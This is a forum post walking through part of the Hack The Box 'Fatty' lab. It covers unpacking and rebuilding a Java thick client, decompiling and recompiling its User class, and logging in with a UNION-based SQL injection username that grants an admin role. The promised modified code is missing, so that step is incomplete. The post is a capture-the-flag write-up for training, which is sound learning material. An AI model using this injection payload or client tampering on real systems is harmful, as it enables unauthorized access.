I asked forum’s staff to delete my previous post as it was no longer editable. There was an issue in very last step in SQL injection login command. Modified version of the original “short run” is below.
This section is a part of ‘insane’ HTB box “Fatty”.
I wonder why HTB decided to put it into the medium module but whatever.
If you don’t want to spend as much time as I did - here is a “fast” run (it should
take around 30-40 min), spoilers:
- You don’t need to map ip with server.fatty.htb as it is already done in hosts file,
so you may skip wireshark step.
- Extract all the files from fatty-client.jar;
- Location of the file is
C:\inetpub\ftproot\
- Change port from 8000 to 1337 in beans.xml (
<constructor-arg index="1" value = "1337");
- It might say that you don’t have right privileges so be sure that
you’ve launched notepad as admin;
- Remove sha256 hashes from MANIFEST.MF in META-INF folder;
- And again it might say that you don’t have the right privileges, so use admin
notepad.
-
Delete 1.RSA and 1.SF;
-
Build a new client:
jar -cmf .\META-INF\MANIFEST.MF ..\fatty-client-new.jar *
- I use admin powershell as well;
- I assume that you cd into
C:\inetpub\ftproot\, client appears inC:\inetpub; - Pay attention to *;
Now you might want to check if newly generated client works as inteded and continue:
- Drag newly generated
fatty-client-new.jarto JD-GUI and save all source file on a Desktop;
- JD-GUI is located in TOOLS folder on a Desktop
-
Extract files from newly created file
fatty-client-new-jar.src.zipon a Desktop (right click on the archive andextract to fatty-client-new-jar.src\); -
Copy
fatty-client-new.jarfromC:\inetpubon a Desktop; -
Find and modify User.java file in one of extracted folders (precisely:
fatty-client-new.jar.src\htb\fatty\shared\resources\User.java).
You should find following parts of the code: public User (string 20) and public void setPassword (string 76), you have to modify these methods code as indicated below:
...............................................................................................
-ORIGINAL CODE-
...............................................................................................
/* */ public User(int uid, String username, String password, String email, Role role) {
/* 20 */ this.uid = uid;
/* 21 */ this.username = username;
/* 22 */ this.password = password;
/* 23 */ this.email = email;
/* 24 */ this.role = role;
/* */ }
...............................................................................................
-ORIGINAL CODE-
...............................................................................................
/* */ public void setPassword(String password) {
/* 76 */ this.password = password;
/* */ }
...............................................................................................
-ORIGINAL CODE-
...............................................................................................
- I am not very familiar with java programming, so I don’t know if it is required to
keep strings numbers(*/1 etc)in precise order or not to write numbers for empty
strings or"}". But I did it in all the cases in order not to break anything
Now you need to build a new client to make your SQL injection, change directory in powershell with cd C:\Users\cybervaca\Desktop and continue.
- Compile User.java with following command:
javac -cp fatty-client-new.jar fatty-client-new.jar.src\htb\fatty\shared\resources\User.java
- I assume that
fatty-client-new.jararchive andfatty-client-new.jar.srcfolder are on a Desktop.
-
Make a new dir (raw) with
mkdir raw; -
Copy new client archive into the raw folder:
cp fatty-client-new.jar raw\fatty-client-new-2.jar -
Open the raw folder and extract files from the
fatty-client-new-2.jar(Extract Here); -
Overwrite User.class file in
raw\htb\fatty\shared\resources\with following command:
mv -Force fatty-client-new.jar.src\htb\fatty\shared\resources\User.class raw\htb\fatty\shared\resources\
(there should be only one User.class file). Or you may just drag it from one folder to another. -
Cd to raw and build a new client
jar -cmf META-INF\MANIFEST.MF client_name.jar .
- Pay attention “.” at the end is required!
- Launch the client, input credentials:
Username:abc' UNION SELECT 1,'abc','a@b.com','abc','admin
Password: abc
- Last time format here wasn’t correct even I had copied it directly from Windows system.
It should work now, but if you have issues and get “Login Failed” or stuck feel free to grab
Username string from the module.
- Server Status should be available now and you can get Ipconfig.
P.S. Just followed all the steps and it works!